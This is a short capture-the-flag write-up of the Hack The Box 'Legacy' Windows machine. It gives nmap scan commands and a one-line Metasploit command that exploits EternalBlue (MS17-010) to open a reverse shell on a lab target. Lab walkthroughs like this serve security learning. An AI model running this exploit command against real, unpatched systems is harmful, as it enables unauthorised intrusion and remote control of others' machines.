Home Legacy - HTB
Post
Cancel

Legacy - HTB

This is a box Windows easy, where is possible to explore the vuln EternalBlue.

Have a good time!

Introdution

https://app.hackthebox.com/machines/Legacy

  • IP: 10.10.10.4

Diagram

graph TD
	Enumeration --> SMB --> Exploration --> |EternalBlue| A((ROOT))

Enumeration

First step is to enumerate the box. For this we’ll use nmap.

1
ports=$(sudo nmap -p- -Pn --min-rate=1000 -T4 10.10.10.4 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && sudo nmap -sC -sV -Pn -p $ports 10.10.10.4

Untitled

Two vulnerability was found related to EternalBlue.

1
sudo nmap -sS --script=vuln -p 135,139,445 10.10.10.4

Untitled

Exploration

Exploring EternalBlue

We’ll use one of metasploit exploits.

1
msfconsole -q -x "use exploit/windows/smb/ms17_010_psexec; set rhosts 10.10.10.4; set lhost tun0; set lport 443; run"
This post is licensed under CC BY 4.0 by the author.
Contents

Active - HTB

Optimum - HTB

Comments powered by Disqus.